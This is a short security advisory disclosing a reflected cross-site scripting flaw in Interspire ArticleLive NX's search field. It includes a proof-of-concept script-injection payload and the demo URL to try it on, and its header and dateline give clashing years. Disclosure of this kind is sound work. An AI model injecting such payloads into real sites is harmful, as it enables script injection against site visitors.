____________________________________________________________________________
____________________________________________________________________________

01010111 01001001 01010010 01000101 01000100  01010011 ->
01000101 01000011 01010101 01010010 01001001  01010100 ->
01011001                                                      

____________________________________________________________________________
ADVISORY: INTERSPIRE ARTICLELIVE NX XSS
____________________________________________________________________________

_____________________
|| 0x00: ABOUT ME
|| 0x01: DATELINE
|| 0x02: INFORMATION
|| 0x03: EXPLOITATION
|| 0x04: RISK LEVEL

____________________________________________________________
____________________________________________________________

_________________
|| 0x00: ABOUT ME

Author: SkyOut
Date: May 2008
Website: http://wired-security.net/

_________________
|| 0x01: DATELINE

2007-05-09: Bug found
2007-05-10: Advisory released

____________________
|| 0x02: INFORMATION

The website of the product, located at http://www.interspire.com/articlelive/,
says the following about their tool:

"ArticleLive is a complete content management package that lets you start,
maintain and grow your own article, news and/or blog site. It includes
professionally designed, CSS-driven website templates which are easy to
customize to your liking."

So it is a news script. Now the problem occurrs due to a badly filtering search
engine! You can easily escape the value="" parameter and inject JavaScript.

_____________________
|| 0x03: EXPLOITATION

To test this, try a demo, they provide it for free:
http://www.interspire.com/articlelive/demo.php

Then go the site including the search field, it is located here:
http://websitepublisher.interspire-demo.com/demo_<some number>/search

Escape the given string with "> first and then make your JavaScript!

E.g.: "><script>alert("XSS");</script>

Results in:

__________________________________________
|                                      X |
|________________________________________|
|                                        |
|                                        |
|    ^                                   |
|   / \                                  |
|  / | \        XSS                      |
| /  .  \                                |
| -------                                |
|                               ______   |
|                              |  OK  |  |
|                               ------   |
|________________________________________|

___________________
|| 0x04: RISK LEVEL

- LOW - (1/3) -

<!> Happy Hacking <!>

____________________________________________________________________________
____________________________________________________________________________

EOF